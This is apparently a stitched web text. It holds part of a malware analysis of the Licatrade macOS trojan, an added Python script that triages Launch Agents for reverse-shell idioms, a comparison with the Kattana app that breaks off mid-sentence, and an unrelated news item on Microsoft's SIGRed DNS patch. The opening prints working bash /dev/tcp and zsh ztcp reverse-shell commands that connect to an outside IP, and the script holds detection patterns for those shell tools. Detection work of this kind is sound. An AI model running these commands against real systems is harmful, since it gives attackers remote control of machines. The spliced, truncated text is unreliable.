screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212[.]97/25733 0>&1'

zsh using ztcp:

zsh -c 'zmodload zsh/net/tcp && ztcp 193.37.212[.]97 25734 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
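The two artefacts this analysis leaves on a victim machine, a hidden file in ~/Library/LaunchAgents that is not a property list at all, and the bash /dev/tcp or zsh ztcp reverse-shell idioms shown in the command lines above, are both easy to triage from the defender's side. The following is an added example, not ESET's tooling: it validates each Launch Agent with plistlib (which rejects the Licatrade file the way launchd does), pulls the command line out of well-formed agents, and matches both against the idioms from the table. Sample files are constructed in a temporary directory, with the C&C address replaced by a documentation address (192.0.2.10); pointing scan_launch_agents() at a real ~/Library/LaunchAgents is left to the reader.

```python
"""Triage macOS Launch Agents for the persistence pattern described above.

Added example, not ESET's tooling. It looks for two things the Licatrade
analysis describes: a Launch Agent file that is not a valid property list
(launchd would reject it), and reverse-shell idioms (bash /dev/tcp, zsh ztcp,
detached screen) inside a plist's ProgramArguments. Sample files are
constructed in a temporary directory; nothing is executed from them.
"""
import plistlib
import re
import tempfile
from pathlib import Path
from typing import Dict, List

# Idioms taken from the sample's command lines; extend for your environment.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/\S+/\d+"),                 # bash network redirection
    re.compile(r"zmodload\s+zsh/net/tcp|\bztcp\b"),  # zsh TCP module
    re.compile(r"\bbash\s+-i\b"),                    # interactive shell bound to a socket
    re.compile(r"screen\s+-d\s+-m"),                 # detached screen session
]


def reverse_shell_indicators(text: str) -> List[str]:
    """Return the patterns from REVERSE_SHELL_PATTERNS that match text."""
    return [p.pattern for p in REVERSE_SHELL_PATTERNS if p.search(text)]


def triage_launch_agent(path: Path) -> Dict[str, object]:
    """Classify one Launch Agent file; the file is only read, never run."""
    findings: List[str] = []
    raw = path.read_bytes()
    if path.name.startswith("."):
        findings.append("hidden filename")          # dotfiles are unusual here
    try:
        plist = plistlib.loads(raw)
    except Exception:
        # Not a plist at all: launchd cannot load it (the Licatrade case),
        # but the file is still a strong sign something tried to persist.
        findings.append("not a valid property list")
        text = raw.decode("utf-8", errors="replace")
    else:
        args = plist.get("ProgramArguments", [])
        text = " ".join(str(a) for a in args) + " " + str(plist.get("Program", ""))
        if str(plist.get("Label", "")).startswith("com.apple."):
            findings.append("impersonates an Apple label")
    hits = reverse_shell_indicators(text)
    if hits:
        findings.append("reverse shell idiom: " + ", ".join(hits))
    return {"file": path.name, "suspicious": bool(findings), "findings": findings}


def scan_launch_agents(directory: Path) -> List[Dict[str, object]]:
    """Triage every file in directory, hidden files included."""
    return [triage_launch_agent(p) for p in sorted(directory.iterdir()) if p.is_file()]


def build_sample_dir() -> Path:
    """Create constructed sample files mirroring the cases in the analysis."""
    d = Path(tempfile.mkdtemp(prefix="launchagents_"))
    # Case 1: a raw command line dropped where a plist should be (Licatrade's broken persistence).
    (d / ".com.apple.system.plist").write_text(
        "echo 'x'; while :; do sleep 10000; screen -X quit; lsof -ti :25733 | xargs kill -9; "
        "screen -d -m bash -c 'bash -i >/dev/tcp/192.0.2.10/25733 0>&1'; done\n")
    # Case 2: a well-formed plist that starts a zsh ztcp shell (Cointrazer-style working persistence).
    with open(d / ".com.apple.update.plist", "wb") as f:
        plistlib.dump({"Label": "com.apple.update", "RunAtLoad": True,
                       "ProgramArguments": ["zsh", "-c",
                           "zmodload zsh/net/tcp && ztcp 192.0.2.10 25734 && "
                           "zsh >&$REPLY 2>&$REPLY 0>&$REPLY"]}, f)
    # Case 3: a benign agent for a local backup job.
    with open(d / "com.example.backup.plist", "wb") as f:
        plistlib.dump({"Label": "com.example.backup", "StartInterval": 3600,
                       "ProgramArguments": ["/usr/local/bin/backup.sh", "--quiet"]}, f)
    return d


if __name__ == "__main__":
    for result in scan_launch_agents(build_sample_dir()):
        print(result)
```

A string match on ProgramArguments catches only agents that embed the shell idiom directly; an agent that merely runs a script path (as run.sh does from the app bundle) would need the referenced script read and checked the same way, and any outbound connection to the unencrypted ports in the table above is a second, network-side indicator.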

The rebranded Kattana application is also in the resources of the application bundle. We wanted to see if, besides the change in name and icon in the application, some other code was changed. Since Kattana asks for credentials for trading platforms to perform trading, we verified if the input fields of these were tampered with and if credentials were exfiltrated in some way. Kattana is built with Electron, and Electron apps have an app.asar file, which is an archive containing the JavaScript code of the application. We have checked all changes between the original Kattana application and the malicious Licatrade copycat and found that only strings and images were changed.

Figure 5. Partial difference between Kattana and Licatrade

Licatrade and its

Microsoft patches critical, wormable flaw in Windows DNS Server

The company urges organizations to waste no time in installing updates to fix the vulnerability that rates a ‘perfect’ 10 on the severity scale

Microsoft has released a patch addressing a vulnerability that has been present in Windows Domain Name System (DNS) Server for no fewer than 17 years. Dubbed SIGRed, this critical Remote Code Execution (RCE) vulnerability affects all Windows Server versions 2003 through 2019 and, if exploited, could be used to compromise a company’s entire IT infrastructure.

Tracked as CVE-2020-1350, the vulnerability was classified as “wormable” and earned the highest possible score of 10.0 on the Common Vulnerability Scoring System (CVSS) severity scale.

“Wormable vulnerabilities have the potential to spread via malware between vulnerable computers without user interaction,” said Mechele Gruhn, a principal security program manager at Microsoft. “While this vulnerability is not currently known to be used in active attacks, it is essential that customers apply Windows updates to address this vulnerability as soon as possible,” she added.

Much the same message was dispatched by the United States Cybersecurity and Infrastructure Security Agency (CISA).

Microsoft has released an update addressing a “wormable” RCE vulnerability, CVE-2020-1350, in Windows DNS Server. Update asap! https://t.co/yjvpIgZbA3 #Cybersecurity #InfoSec

— US-CERT (@USCERT_gov) July 14, 2020

The flaw, which can be triggered by a malicious DNS response, was discovered by Check Point researchers, who reported it to Microsoft in May. According to their detailed write-up, an attacker who can exploit the vulnerability would gain Domain Administrator rights and seize control of the target’s entire IT infrastructure. This could entail accessing and stealing documents and tampering with emails or network traffic. The likelihood of the vulnerability being exploited was deemed high.

SIGRed brings echoes of other wormable vulnerabilities, notably BlueKeep in Remote Desktop Protocol (RDP) as well as the vulnerability in the Server Message Block (SMB) protocol that was exploited by EternalBlue. The patch for the newly-identified vulnerability is part of Microsoft’s Patch Tuesday rollout, which fixed a total of 123 security flaws this month, including 18 rated as critical.